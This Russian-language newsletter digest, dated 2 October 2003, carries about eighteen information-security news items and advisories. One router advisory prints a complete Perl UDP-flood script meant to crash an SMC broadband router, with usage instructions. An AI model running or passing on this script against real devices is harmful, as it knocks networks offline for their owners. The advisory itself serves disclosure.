Отправляет email-рассылки с помощью сервиса Sendsay
  Все выпуски  

15 новостей по информационной безопасности каждый день


Информационный Канал Subscribe.Ru


Информационная безопасность на Стра.тег.ру за 2003/10/2 00:56 - 2003/10/2 23:56


США: иностранцам не спрятаться, не скрыться

2 октября | Рубрика: Технологии безопасности. Организации разработчики, интеграторы. Информационая безопасность государственной власти Информационая безопасность общественной коммуникации, личности.

Федеральное правительство США собирается обнародовать планы информационного проекта невиданного прежде объема. Новейшие информационные технологии позволят отслеживать перемещение по стране каждого иностранца, въехавшего в США по визе. По оценкам аналитиков, стоимость программы, которая должна предотвратить саму возможность выдачи визы террористам и преступникам, составит от $3 до $10 млрд.

Новая система позволит консульским работникам за рубежом проверять фотографии и отпечатки пальцев лиц, подавших заявки на получение въездных виз, по базам данных уголовных преступников и террористов. При пересечении границы сотрудники иммиграционной службы будут делать электронное сканирование отпечатка указательного пальца каждого въезжающего, и проверять, соответствует ли он указанному во въездной визе. Одновременно компьютерная система будет следить за тем, чтобы визы не были просрочены.

Подробную информацию о новой системе Министерство внутренних дел США планирует сообщить в ноябре; тогда же начнется сбор тендерных предложений. Выбор подрядчика и заключение контракта должны произойти в мае следующего года. Уже к 2005 году планируется развернуть систему сканирования в 50 крупнейших транспортных узлах. Эксперты, тем не менее, указывают на то, что подобные масштабные проекты редко когда удается реализовать в установленные сроки.

Бюджет проекта под названием U.S. Visitor and Status Indication Technology или U.S. VISIT, только в этом году составил $380 млн., и на следующий год министерство запросило еще столько же. За право получить генеральный подряд на разработку систему будут бороться Lockheed Martin Corp., Computer Sciences Corp. и Accenture Ltd.

Борцы за гражданские права обращают внимание на то, что система глобального мониторинга отпечатков пальцев легко может быть распространена и на другие группы населения, а не только на иностранцев. Официальные представили министерства возражают, что новая система крайне необходима для идентификации потенциально опасных гостей из-за рубежа, а следить за собственными гражданами у них и в мыслях не было. Иммиграционная служба сейчас регистрирует только прибывающих в страну и никак не отслеживает их отбытие, поэтому и не знает, сколько их остается в США с просроченными визами. Только в прошлом году Госдеп выдал 5 млн. краткосрочных виз. Теперь, полагают оптимисты, впервые станет возможным контролировать продолжительность пребывания иностранцев в США.

Скептики считают иначе. С их точки зрения, сбор информации о таком огромном количестве людей бессмыслен, если только государство не выделит огромные средства на поиск и принудительную депортацию тех иностранцев, которые угрожают США и злоупотребляют гостеприимством. За последние четыре года 400 тыс. человек, которым было предписано покинуть страну, исчезли без следа, не дожидаясь депортации.

0

IBS признана лучшим российским партнером Symantec

2 октября | Рубрика: Технологии безопасности. Организации разработчики, интеграторы.

Компания IBS признана лучшим российским партнером Symantec в категории Enterprise Solution Partner по итогам прошедшего финансового года.

IBS с 1995 года тесно сотрудничает с Symantec – мировым лидером в области решений по обеспечению информационной безопасности. Партнерские отношения IBS и Symantec динамично развиваются практически с момента открытия представительства Symantec в России, а с 2001 года IBS имеет официальный статус Enterprise Solution Partner.

«За прошедший финансовый год IBS увеличила объемы продаж продуктов Symantec на 25%. Особенно приятно отметить тот факт, что мы смогли добиться существенного роста не только в области продаж ПО, но и в реализации комплексных проектов по обеспечению информационной безопасности корпоративных заказчиков», – заявила Алена Сало, директор Департамента системных решений IBS. – «Мы намерены и дальше развивать наше сотрудничество, расширять спектр используемых продуктов Symantec, в частности за счёт новых решений на основе Symantec Enterprise Security Architecture».

На базе IBS действует центр русскоязычной технической поддержки пользователей по вcему спектру программного обеспечения Symantec. Центр является первым и единственным российским аналогом расположенных по всему миру центров службы поддержки. Кроме технической поддержки программного обеспечения IBS предоставляет корпоративным пользователям широкий спектр дополнительных услуг, включающий в себя углубленный мониторинг и консалтинг систем информационной безопасности на базе продуктов Symantec, а также их комплексное проектирование и внедрение.

В течение прошлого года компания IBS совместно c Symantec успешно реализовала ряд проектов, среди которых можно отметить корпоративное соглашение с Центральным Банком РФ о поставке продуктов Symantec в региональные структуры Банка, а также соглашение о сотрудничестве с ОАО «ВымпелКом» о поставке продуктов Symantec и предоставлении консультационных и сервисных услуг, включающих информационную и техническую поддержку по их использованию, предоставление технической информации, обновленных версий поддерживаемых программ и антивирусных баз данных, а также дополнительных программных компонент.

Глава представительства Symantec Ltd. в России и СНГ Владимир Ларин отметил: «За многие годы сотрудничества компания IBS сделала большой вклад в развитие и укрепление наших позиций на российском рынке решений в области информационной безопасности. Данная награда является закономерным следствием целенаправленных мероприятий по продвижению решений на базе продуктов Symantec и не только лишний раз подтверждает высокий профессионализм IBS, но и ставит новые, более высокие задачи для нашего тесного партнерства».

1

Межсайтовый скриптинг в Atrise Everyfind

2 октября | Рубрика: Дыры и патчи программ и операционных сред Проблемные ситуации, информационная преступность, сетевые войны

Программа: Atrise 5.0.2

Опасность: Низкая

Наличие эксплоита: Не нужен

Описание: Уязвимость обнаружена в проверке правильности ввода обнаружена в поисковом движке Atrise Everyfind. Удаленный пользователь может выполнить XSS нападение.

Сценарий 'search.html' не фильтрует данные представленные пользователем, перед отображением их на странице результатов поиска. В результате удаленный атакующий может выполнить XSS нападение против пользователей системы.

URL производителя:http://www.atrise.com/everyfind/

Решение: Установите обновленную версию программы (5.0.3): http://www.atrise.com/everyfind/evf.zip

2

Компьютерные атаки на компании организовывают плохие сотрудники

2 октября | Рубрика: Информационая безопасность бизнеса

За последние 12 месяцев  82% американских компаний, опрошенных исследовательской организацией - Институтом Компьютерной Безопасности (Computer Security Institute) - сталкивались с проблемой компьютерных вирусов (нанесенный ими ущерб оценивается в $27.3 млн.).

У сотрудников 59% компаний преступники крали лэптопы, в которых содержалась ценная информация (ущерб составил $6.8 млн.). У 42% компьютерные сети давали сбои (потери превысили $65.4 млн.). У 21% фирм из электронных баз данных была похищена ценная информация (ущерб - почти $71.2 млн.). 15% компаний стали жертвами финансового мошенничества (мошенники нанесли ущерб в $.10.1 млн.).

Любопытно, что наиболее часто взламывают корпоративные компьютерные сети сотрудники самой компании - они были виновниками подобных происшествий в 86% случаев. 74% атак на совести хакеров, 53% - американских компаний-конкурентов. В 30% инцидентов пострадавшие обвиняют иностранные компании, а в 21% случаев - правительственные структуры иных государств (сумма значений более 100%, поскольку опрошенные могли выбрать несколько вариантов ответа).

По прогнозу компании IDC, в 2002-2007 годы затраты американских фирм на обеспечение безопасности своих компьютерных баз данных вырастут на 15-18%. На 16% увеличатся затраты на оборудование и программное обеспечение, которое позволяет выявить факт незаконного проникновения в корпоративные компьютерные сети.

3

Дыра в непропатченных браузерах Microsoft - золотая жила для хакеров

2 октября | Рубрика: Дыры и патчи программ и операционных сред Проблемные ситуации, информационная преступность, сетевые войны

Эксперты по безопасности предупреждают, что дыры в безопасности Microsoft Internet Explorer (IE), которые так долго игнорировались, подтвердили свою полезность для хакеров, предоставляя последним возможность размещать на уязвимых компьютерах свои вредоносные программы, используя для этого хакерские сайты и приложения для рассылки.

По словам независимого эксперта по безопасности Ричарда Смита (Richard Smith), новые атаки через эту дыру используют червь, распространяющийся через America Online Inc.'s Instant Messenger (AIM) и хакерский сайт, которые незаметно загружают на клиентский компьютер вредоносную программу.

"Дыра", известная как "уязвимость объектных данных", содержится в коде, используемом IE для обработки HTML-кода с тегами типа Object Data. Если правильно воспользоваться этой дырой, можно разместить на машине пользователя желаемую программу.

В отличии от открытия e-mail сообщений или посещения созданных злоумышленниками сайтов, в данном случае от пользователя не требуется никаких действий, чтобы компьютер заразился. 20-го августа Microsoft выпустила патч (MS03-032), который должен был устранить эту проблему. Однако, этот патч не закрыл дыру в IE версии 5.01, 5.5 и 6.0.

8 сентября Microsoft подтвердила наличие проблемы с патчем MS03-032 и пообещала исправить её в ближайшее время. Но с тех пор никаких изменений не произошло.

4

Пароль заменит «клавиатурный портрет»

2 октября | Рубрика: Технологии безопасности. Организации разработчики, интеграторы. Информационая безопасность общественной коммуникации, личности.

Исследователи в технологическом университете "Технион" (Technion) в Израиле предложили новый вариант ввода пароля при включении компьютера. Это так называемая "бихевиометрическая" технология, основанная на анализе присущей каждому из пользователей специфическому обращению с клавиатурой компьютера. Программа, распознающая пользователя, сможет в будущем обеспечить безопасный доступ к компьютеру и хранящимся на нем данным.

Разработка была осуществлена студентами под руководством профессоров Рана Эль-Янива (Ran El-Yaniv) и Рона Меира (Ron Meir) в лаборатории поиска и анализа данных. Программа основана на универсальном алгоритме прогнозирования, в котором используется статистика по характерным особенностям набора текстов конкретным пользователем. В результате создается "клавиатурный портрет" пользователя, который вносится в память компьютера и становится паролем. Профессор утверждает, что уникальной характеристикой пользователя является интервал между последовательными ударами по клавишам, и иногда достаточно всего лишь нескольких ударов для однозначной идентификации.

Стоит отметить, что и раньше предпринимались попытки подобного рода идентификации пользователей, однако они надежно работали только в том случае, когда пользователю предлагали набрать на клавиатуре одно конкретное и довольно длинное предложение. В разработке израильских ученых пользователь может набирать любой текст. Система распознавания устроена так, что точность идентификации повышается при увеличении отрезка времени, который пользователь тратит на "обучение" системы. Но даже при "обучении", которое ограничивается лишь несколькими набранными строками текста, вероятность распознавания при вводе короткого предложения вроде "Что ты сегодня делал?" составляет 90%. Интересно, что система отслеживает развитие навыков пользователя и постоянно уточняет "клавиатурный портрет", который со временем становится все более уникальным.

5

Итоги научно-практического семинара «Проблемы противодействия компьютерной преступности»

2 октября | Рубрика: События, семинары, конференции, даты

26 сентября 2003 года Центр исследования проблем компьютерной преступности(Computer Crime Research Center), при содействии Центра по изучению транснациональной преступности и коррупции при Американском университете (Вашингтон, США), провел международный научно-практический семинар на тему «Проблемы противодействия компьютерной преступности».

Своей задачей организаторы семинара ставили обмен опытом по вопросам борьбы и противодействия компьютерной преступности, установление и развитие деловых контактов, ознакомление с идеями, подходами и конкретными результатами решения теоретических и практических задач.

С приветственным словом к участникам семинара выступил первый проректор Гуманитарного университета «ЗИГМУ», доктор юридических наук, профессор Лукашевич Виталий Григорьевич.

Основной формой работы семинара стали выступления, дискуссии и проведение круглого стола.

Актуальным проблемам противодействия компьютерной преступности, включая экономические, правовые, организационные и технические вопросы информационной безопасности были посвящены выступления:

Маклакова Геннадия Юрьевича, д.т.н., профессора Севастопольского национального технического университета – «Возможности современных информационных технологий в процессе интенсификации противодействия компьютерной преступности»;

Голубева Владимира Александровича, к.ю.н., доцента, директора Запорожского Центра исследования проблем компьютерной преступности – «Электронный терроризм - новое лицо терроризма»;

Ахтырской Натальи Николаевны, к.ю.н., заведующей кафедрой уголовного процесса и криминалистики Гуманитарного университета «ЗИГМУ» - «Борьба с преступлениями в банковских информационно-вычислительных системах»;

Берзина Павла Сергеевича, аспиранта кафедры уголовного права и криминологии Киевского национального университета им. Тараса Шевченко – «Отдельные вопросы определения и соотношения действий, связанных с незаконным использованием знаков для товаров и услуг, фирменных наименований в процессе нарушения законодательства, регулирующего производство, экспорт, импорт дисков для лазерных систем считывания»;

Галушко Павла Павловича, главного специалиста Центра «Права» (г. Харьков) - «Спам и проблемы безопасности»;

Гуцалюка Михаила Васильевича, к.ю.н., старшего научного сотрудника МНДЦ при Координационном комитете по борьбе с коррупцией и организованной преступностью при Президенте Украины – «Противодействие компьютерной преступности»;

Перепелятникова Валерия Николаевича, начальник отдела по борьбе с преступлениями в сфере интеллектуальной собственности и высоких технологий УМВД Украины в Запорожской области – «Вопросы противодействия преступности в сфере интеллектуальной собственности и высоких технологий»;

Катаева Станислава Львовича, доктора социологических наук, профессора, заведующего кафедрой социологии Гуманитарного университета «ЗИГМУ» - «Причины вирмейкинга: социологический анализ»;

Надежды Костюченко, аспиранта Гомельского государственного технического университета им.П.О.Сухого – «Преступления против информационной безопасности по законодательству Республики Беларусь»;

Сайтарлы Тимофея Анатольевича, эксперта Центра исследования проблем компьютерной преступности - «Мировая практика борьбы с детской порнографией в Интернете».

В работе научно-практического семинара приняли участие специалисты служб информационной безопасности банков, сотрудники Департамента специальных телекоммуникационных систем и защиты информации СБУ, Департамента государственной службы борьбы с экономическими преступлениями, прокуратуры,а также их коллеги из Республики Беларусь и России.

Выступления участников публикуются на сайте Центра исследования проблем компьютерной преступности http://www.crime-research.ru.

Материалы научно-практического семинара будут также опубликованы организаторами в сборнике научных трудов Гуманитарного университета "ЗИГМУ".

6


"Трояны" помогают ревнивым любовникам

2 октября | Рубрика: Проблемные ситуации, информационная преступность, сетевые войны Информационая безопасность общественной коммуникации, личности.

Фирма "Lover Spy" предложила услугу влюбленным и супругам по шпионажу за компьютерами друг друга. Послав электронную поздравительную открытку через "Lover Spy" своему подозрительному "возлюбленному", клиент одновременно отсылает "троянского коня", который начинает собирать о нажатиях клавиш, паролях и даже может включать web-камеру. Программа может также делать скриншоты и периодически отсылает полные отчеты на сервер "Lover Spy", сохраняя анонимность заказчика.

За US$ 89 можно купить эту возможность отослать милое "поздравление" на 5 компьютеров. Однако такая услуга конфликтует с законодательством США, нарушая права граждан. Помимо того, что установка шпионящих программ на чужой компьютер является незаконной, но и устанавливать такую программу на свой компьютер, за которым могут работать другие люди, также противоречит закону. К тому же не только продавец такой услуги нарушает закон, но и тот, кто ее оплачивает. Ответственность за такое нарушение может достигать лишения свободы до 10 лет.

7


Корея переходит на open-source

2 октября | Рубрика: Технологии безопасности. Организации разработчики, интеграторы.

Правительство Южной Кореи объявило о том, что к 2007 году планирует заменить на значительном количестве своих ПК и серверов проприетарное ПО альтернативами с открытым исходным кодом.

Как сообщило Министерство информации и связи, тысячи компьютеров в министерствах, госучреждениях и университетах Южной Кореи заменят операционную систему Windows и комплекс офисных приложений Microsoft альтернативами с открытым исходным кодом. По словам представителя министерства, к 2007 году будет заменено 20% всех настольных программ и 30% серверных.

В качестве первого шага такие организации, как Агентство развития промышленности и Ассоциация информации и связи Кореи, переведут как настольные ПК, так и серверы на операционную систему Linux, веб-браузер Mozilla и другое ПО open-source. «Если этот шаг окажется успешным, мы сможем экономить около 300 млн долл. в год. К тому же мы сможем гарантировать безопасность и совместимость национальных информационных систем», — сказал представитель министерства.

Однако эксперты скептически относятся к идее, утверждая, что у корейских разработчиков ПО недостаточно ресурсов, чтобы поддерживать и Windows, и Linux. Кроме того, Microsoft Korea утверждает, что коммерческое ПО никогда не было особенно дорогим. Директор по маркетингу Microsoft Korea Квон Чан сказал, что, хотя ПО open-source на первый взгляд может показаться дешевле, со временем, с учетом расходов на администрирование и обслуживание, оно обойдется дороже.

Правительство Южной Кореи высказывается за конкуренцию. «Мы предоставим всем, кто использует ПО с открытым исходным кодом, доступ к веб-услугам. Когда появится соответствующая среда, начнется настоящая конкуренция», — сказал представитель правительства.

Сейчас пользователи Linux не могут обращаться к некоторым ключевым корейским веб-службам. Например, многие порталы банков и госучреждений поддерживают исключительно операционную систему Microsoft Windows и браузер Internet Explorer.

Чтобы обеспечить активное участие групп разработчиков open-source, Министерство информации и связи надеется получить помощь от других корейских министерств.

В прошлом месяце представители Японии, Китая и Южной Кореи встретились в столице Камбоджи Пномпене для подписания соглашения о совместных исследованиях и разработках в сфере альтернативной Windows операционной системы с открытым исходным кодом.

8

Африка борется с кибер-преступностью

2 октября | Рубрика: Регулирование: Законы, постановления, сертификация, контроль Технологии безопасности. Организации разработчики, интеграторы.

Агенты ФБР уже почувствовали себя настолько всемогущими в плане предотвращения кибер-преступлений, что отправились в командировку в Западную Африку в Гану, где собираются преподать уроки кибер-расследования африканским полицейским.

Как выяснилось в последние годы, уровень кибер-преступлений в развивающихся странах не только не ниже, но порой даже выше, чем в странах развитого капитализма - онлайновые мошенники пользуются тем, что даже те немногие пользователи Интернета еще очень неопытны и их запросто можно "надуть".

На семинары американских коллег пришли более 20 ганских полицейских. Поскольку из истории мы знаем, что именно с таких визитов иногда начинается разделение сфер влияния, российским экспертам в области компьютерных преступлений надо срочно подхватывать эстафету и начинать делиться своим опытом с кем-нибудь из наших соседей, пока этого не сделали американцы.

9


Украинские хакеры - серьезная угроза для США

2 октября | Рубрика: Проблемные ситуации, информационная преступность, сетевые войны Информационая безопасность бизнеса

Как ранее уже сообщалось на CCRC Максим Ковальчук, арестованный в мае этого года в Таиланде по обвинению в продаже через интернет пиратского программного обеспечения, оказался ключевой фигурой пиратской сети, совершавшей различного рода преступления в сфере информационных технологий. В настоящее время он ожидает решения суда по вопросу об экстрадиции в США. Арест Ковальчука был произведен тайскими властями по запросу США, уголовное дело было заведено в американском штате Калифорния.

Как пишет репортер MSNBC Майк Брункер (Mike Brunker), Ковальчук - 25-летний уроженец города Тернополь (Украина) - с помощью сложных схем организовывал продажу взломанных копий программ ведущих американских производителей и встраивал в них программы для получения доступа к компьютерам покупателей, а также занимался другими видами электронного мошенничества.

Майк Брункер особо отмечает, что информация по делу Ковальчука держится американскими спецслужбами в секрете, так как они рассчитывают выйти на его пособников. Американские власти считают, что Ковальчук играл важную роль в сети компьютерных пиратов, организованной украинскими преступными структурами. Власти США считают украинских хакеров серьезной угрозой для американских владельцев прав на интеллектуальную собственность и намереваются развернуть крупномасштабную операцию по нейтрализации пиратов. Однако, по мнению Брункера, спецслужбам США так и не удается наладить эффективное взаимодействие с правоохранительными органами Украины.
10


Украина: готовится новый законопроект

2 октября | Рубрика: Регулирование: Законы, постановления, сертификация, контроль

В среду, 1 октября, в Верховной Раде началось обсуждение законопроекта "О внесении изменений в Закон "Об организационно-правовых основах борьбы с оргпреступностью", касающийся борьбы с компьютерной преступностью.

11


AOL предоставил новые фильтры спама

2 октября | Рубрика: Технологии безопасности. Организации разработчики, интеграторы.

Компания America Online представила пользователями своего веб-клиента AOL 8.0 Plus новый фильтр спама, сообщает MacCentral.

Новые версии фильтров спама для пользователей других версий клиента (AOL 8.0, AOL 7.0, AOL 6.0 и AOL для Mac OS X) ожидаются в ближайшем будущем.

Новые фильтры будут поставляться пользователям в автоматическом режиме, и по мнению Дэвида Гэнга, вице-президента AOL, установившие их пользователи довольно быстро заметят результат - количество нежелательных писем в их ящиках заметно сократится.

Ранее подобные фильтры были доступны только пользователям клиента AOL 9.0 Optimized. Эти фильтры способны "обучаться" и приспосабливаться под развивающуюся технологию рассылки спама. Фильтры не требуют дополнительного программного обеспечения и лишних усилий по их установке.

По официальным сведениям, на данный момент ежедневно клиенты AOL рапортуют о 10 миллионах нежелательных писем, приходящих на их ящики. Эти данные получены по анализам статистики работы функции Report Spam, доступной в версиях веб-клиентов AOL 8.0, AOL 8.0 Plus и AOL 9.0 Optimized.

12

Несколько дыр в OpenSSL

2 октября | Рубрика: Технологии безопасности. Организации разработчики, интеграторы.

Участники проекта OpenSSL предупреждают об обнаружении нескольких серьезных дыр в пакетах OpenSSL версий от 0.9.6j до 0.9.7b и во всех версиях SSLeay. Эти пакеты предназначены для организации передачи данных по протоколу SSL, призванному обеспечивать защиту данных, передаваемых по протоколу HTTP. Специализирующаяся в области компьютерной безопасности компания Secunia присвоила дырам критический рейтинг опасности.

Всего в OpenSSL обнаружены три уязвимости и одна недоработка, упрощающая использование этих уязвимостей. Сразу две дыры обнаружены в реализации языка ASN1 (Abstract Syntax Notation One), с помощью которого описываются способы передачи информации между различными информационными системами.

Первая дыра связана с тем, что неправильные команды ASN1, отвергнутые парсером, могут использоваться для неправильного размещения соответствующих данных в памяти. Это может использоваться для организации DoS-атак, а возможно, и для выполнения произвольного кода на пораженном компьютере. Вторая дыра в ASN1 опасна с точки зрения проведения DoS-атак и связана с ошибками переполнения при обработке тэгов с необычными значениями параметров.

Третья дыра актуальна в наибольшей степени для систем работающих в тестовом режиме, когда включена опция игнорирования ошибок при декодировании открытого ключа. Если хакер использует в такой системе особым образом сформированный открытый ключ, то произойдет ошибка, чреватая отказом от обслуживания клиентов.

Упомянутая выше недоработка, упрощающая использование дыр, связана с ошибками в реализации протоколов SSL/TLS. Эта ошибка сводится к тому, что система может обрабатывать клиентский сертификат, когда такое действие еще не запрошено. Это позволяет хакерам успешно атаковать даже серверы с отключенной авторизацией пользователей.

13

Symantec опубликовала новый отчет о состоянии сетевой безопасности

2 октября | Рубрика: Технологии безопасности. Организации разработчики, интеграторы. Информационные ресурсы

Компания Symantec опубликовала четвертую часть Internet Security Threat Report - отчета о ситуации с сетевой безопасностью, который публикуется регулярно каждые полгода и составляется путем анализа статистических данных из собственных источников компании, а также информации, исходящей от клиентов фирмы и пользователей ее антивирусного ПО.

Результаты выглядят довольно мрачно. Антивирусная компания заявляет, что за прошедшие шесть месяцев уязвимость сетевых приложений выросла на 12%, количество недобросовестных программ выросло на 20%, а число вирусов и интернет-червей увеличилось на 19%. К тому же, отмечается, что за исследуемый период заметно выросла и скорость распространения вирусов в Сети.

Оливер Фридрикс, главный менеджер Symantec Security Response, изложил некоторые факты, демонстрирующие общую неблагоприятную ситуацию с сетевой безопасностью. В частности, вирус Slammer заражал системы за очень короткие промежутки времени, не превышающие одного часа. Исходя из этого, Фридрикс отметил, что создатели вирусов "имеют у себя за спиной годы опыта, и те действия, что раньше у них отнимали дни, сейчас требуют нескольких часов."

Из отчета также ясно, что существенно увеличилась в сети доля интернет-червей, которые для распространения используют каналы IRC и пиринговые сети. Например, из 50 самых опасных вирусов 19 использовали именно такой способ распространения. При этом статистика показывает, что среди вирусописателей набирает популярность создание так называемых комбинированных атак, когда один вредоносный код способен распространяться несколькими путями.

14

Microsoft: одних патчей мало

2 октября | Рубрика: Технологии безопасности. Организации разработчики, интеграторы.

Microsoft будет продолжать поиск способов совершенствования средств установки пользователями обновлений для Windows, или патчей, однако компания поняла, что слишком много заказчиков не устанавливает апгрейды достаточно быстро, чтобы противостоять хакерам. «С одной стороны, было наивно думать, что все заказчики будут устанавливать патчи, — говорит бывший директор по продажам Microsoft Орландо Айала, который теперь возглавляет отдел продаж малым и средним компаниям. — Это просто довольно трудно».

До сих пор усилия Microsoft были сосредоточены главным образом на совершенствовании подхода к написанию кода и последующему исправлению ошибок по мере их обнаружения. «Стратегия безопасности в основном базировалась на работе с поправками», — констатировал Айала в среду в интервью по телефону. Однако недавние атаки червей и вирусов в очередной раз подтвердили, что многие заказчики сохраняют уязвимость еще долго после выхода патчей.

Айала отказался конкретизировать новый подход Microsoft или сказать, входит ли в эти планы дальнейшее продвижение компании на рынок антивирусного ПО. По его словам, усилия будут отчасти связаны с углублением отношений с поставщиками межсетевых экранов. «Мы станем уделять больше внимания тому, что мы называем защитой по периметру, — сказал он. — Это связано с углублением партнерских отношений в мире брандмауэров».

Айала сообщил, что, хотя компания и добилась некоторых успехов с инициативой Trustworthy Computing, теперь она ищет новый подход. «Первый вопрос состоит в том, как обеспечить такую защиту, чтобы не допустить повторных атак, — говорит он. — Это немного другая стратегия. И это очень важно; вот все, что я могу сказать».

Бегущая дорожка патчей
Червь Slammer, атаковавший компании в январе, и недавний червь MSBlast наглядно показали, что заказчики не спешат устранять пробелы в защите своих систем. Для любой компании чрезвычайно трудно угнаться за обновлениями, говорит директор по технологиям службы мониторинга сетей Counterpane Internet Security Брюс Шнайер. «Поток патчей бесконечен. Чтобы не отставать от него, нужно двигаться все быстрее и быстрее».

Недавно руководители Microsoft дали понять, что без изменений, пожалуй, не обойтись. В прошлом месяце, выступая перед топ-менеджерами Кремниевой долины, генеральный директор Microsoft Стив Баллмер сказал, что недавние проблемы безопасности представляют угрозу для инноваций. В то же время Microsoft, по его словам, занимается разработкой «технологии щита». «Сейчас для нас важнее всего технология щита, — заявил он в своем выступлении 15 сентября. — Мы знаем, что плохие парни по-прежнему будут писать вирусы. Цель — создать им преграду на пороге ПК». Тогда Microsoft отказалась комментировать, что именно имел в виду Баллмер.

Поиск средства борьбы с нарастающей лавиной патчей — не только от Microsoft, но и от других производителей ПО — стала главной проблемой ИТ-менеджеров, говорит Райан Макги, директор по маркетингу продуктов отделения McAfee System Protection Solutions антивирусной компании Network Associates. «Эта тема всплывает в разговоре с каждым заказчиком, — рассказывает он. — Мы говорим с ними о том, как уменьшить уязвимость в условиях невозможности устанавливать все патчи».

Последний червь MSBlast, атаковавший компании в августе и сентябре, заразил свыше миллиона компьютеров. С момента появления информации об уязвимости до начала атаки у компаний было 26 дней на обновление своих систем. А согласно недавнему исследованию, запас времени постоянно сокращается. Компаниям, в которых десятки тысяч систем, трудно поддерживать этот темп, говорит Макги. Некоторые фирмы в качестве решения предлагают автоматизировать установку патчей. «Сейчас самое время анонсировать продукт (управления патчами) или приобрести технологию, так как это тот рынок, на котором можно делать деньги», — отметил Макги.

Многие компании уже работают на рынке обнаружения и систематизации уязвимостей компьютеров и сетевых устройств с последующей автоматизацией их устранения. Недавний отчет одной из таких компаний, Qualys, показал, что значительная часть пробелов в защите остается в компьютерах, подключенных к интернету.

«Эта уязвимость делает перспективной продажу систем управления патчами крупным компаниям, — говорит Марк Шевлик, директор компании Shavlik Technologies, специализирующейся на автоматизации процесса обновления ПО. — Особенно когда они сталкиваются с широко распространенной ошибкой вроде той, что создала условия для эпидемии MSBlast». «С июля по сентябрь наши продажи выросли в восемь раз — это очень большой скачок, — продолжает он. — Раньше управлением патчами никто не интересовался. Но с выходом MS03-026 (рекомендация Microsoft, предупреждающая об угрозе MSBlast) рынок для нас в корне изменился».

Шевлик не уверен, что Microsoft движется в правильном направлении, особенно если она слишком сосредоточится на точке пересечения внутренней сети компании с интернетом. «Если возвести защиту по периметру, а червь все же проникнет сквозь нее, он заразит всю вашу сеть», — предупреждает он.

Данный шаг в середине второго года инициативы Microsoft Trustworthy Computing может указывать на то, что впереди у софтверного гиганта большие перемены. Айала признал, что Microsoft требуется нечто лучшее, чем ее Trustworthy Computing. Шнайер из Counterpane считает, что самым большим стимулом для Microsoft может стать создание плохой репутации компании из-за крупных инцидентов. Пока атаки онлайновых вандалов и подражателей продолжаются, Microsoft придется заниматься безопасностью. «Это угроза репутации Microsoft, и им необходимо создать систему защиты, которая предотвратит эту угрозу», — говорит он.

15

Удаленное переполнение буфера в IBM DB2 в обработке LOAD и INVOKE команд

2 октября | Рубрика: Дыры и патчи программ и операционных сред Проблемные ситуации, информационная преступность, сетевые войны

Программа: IBM DB2 7.2, 8.1

Опасность: Высокая

Наличие эксплоита: Нет

Описание: Несколько переполнений буфера обнаружены в базе данных IBM DB2 в обработке LOAD и INVOKE команд. Удаленный авторизованный пользователь с некоторыми привилегиями может выполнить произвольный код на системе.

1. Переполнение стекового буфера обнаружено в команде 'LOAD' (CVE: CAN-2003-0836). Удаленный авторизованный пользователь с "Connect" привилегиями может послать специально сформированную команду LOAD, чтобы выполнить произвольный код на целевой системе с привилегиями администратора на Windows системах и с привилегиями 'db2as' или 'db2inst1' на Linux системах.

2. Переполнение буфера обнаружено в команде 'INVOKE'. Удаленный авторизованный пользователь с "Connect" привилегиями может послать специально сформированную команду INVOKE, чтобы выполнить произвольный код на целевой системе. Код будет выполнен с привилегиями администратора. Уязвима только Windows версия базы данных.

URL производителя: http://www.ibm.com/software/data/db2/udb

Решение: Исправление можно скачать отсюда: http://www-3.ibm.com/cgi-bin/db2www/data/db2/udb/winos2unix/support/download.d2w/report

16

Удаленный DoS против Barricade Turbo Broadband Router SMC2404WBR

2 октября | Рубрика: Дыры и патчи программ и операционных сред Проблемные ситуации, информационная преступность, сетевые войны

Программа: Barricade Turbo Broadband Router SMC2404WBR

Опасность: Средняя

Наличие эксплоита: Да

Описание: Уязвимость обнаружена в Barricade Turbo Broadband Router SMC2404WBR. Злонамеренный пользователь может вызвать DoS нападение.

Удаленный пользователь может послать множественные UDP датаграммы к случайным портам на устройстве, чтобы аварийно завершить работу маршрутизатора.

Пример/Эксплоит:

#!/usr/bin/perl
use Socket;

system(clear);
if(!defined($ARGV[0]))
{
   &usage
}

my ($target);
 $target=$ARGV[0];

my $ia = inet_aton($target) || die ("[-] Unable to resolve
$target");

socket(DoS, PF_INET, SOCK_DGRAM, 17);
    $iaddr = inet_aton("$target");

print "[*] DoSing $target ... wait 1 minute and then CTRL+C to stop\n";

for (;;) {
 $size=$rand x $rand x $rand x $rand x $rand x $rand x $rand x $rand x
$rand x $rand x $rand x $rand x $rand x $rand x $rand x $rand x $rand x
$rand x $rand;
 $port=int(rand 65000) +1;
 send(DoS, 0, $size, sockaddr_in($port, $iaddr));
}
sub usage {die("\n\n[*] Usage : perl $0 <Target>\n\n");}

Решение: Способов устранения обнаруженной уязвимости не существует в настоящее время. Используйте другой продукт,

17

Спецслужбы США открыли "сезон охоты" на украинских хакеров

2 октября | Рубрика: Регулирование: Законы, постановления, сертификация, контроль

Украинец Максим Ковальчук, арестованный в мае этого года в Таиланде по обвинению в продаже через Интернет пиратского программного обеспечения, оказался ключевой фигурой пиратской сети, совершавшей различного рода преступления в сфере информационных технологий. В настоящее время он ожидает решения суда по вопросу об экстрадиции в США.

Ковальчук - 25-летний уроженец города Тернополь - с помощью сложных схем организовывал продажу взломанных копий программ ведущих американских производителей и встраивал в них программы для получения доступа к компьютерам покупателей, а также занимался другими видами электронного мошенничества.

Информация по делу Ковальчука держится американскими спецслужбами в секрете, так как они рассчитывают выйти на его пособников. Американские власти считают, что Ковальчук играл важную роль в сети компьютерных пиратов, организованной украинскими преступными структурами.

Власти США считают украинских хакеров серьезной угрозой для американских владельцев прав на интеллектуальную собственность и намереваются развернуть крупномасштабную операцию по нейтрализации пиратов. Однако, как утверждает MSNBC, спецслужбам США не удается наладить эффективное взаимодействие с Украиной - именно поэтому американцы выследили Ковальчука в Таиланде, когда он направился туда на отдых с женой.

18




Эти и другие новости читайте на сайте Стра.тег



http://subscribe.ru/
E-mail: ask@subscribe.ru
Отписаться
Убрать рекламу

В избранное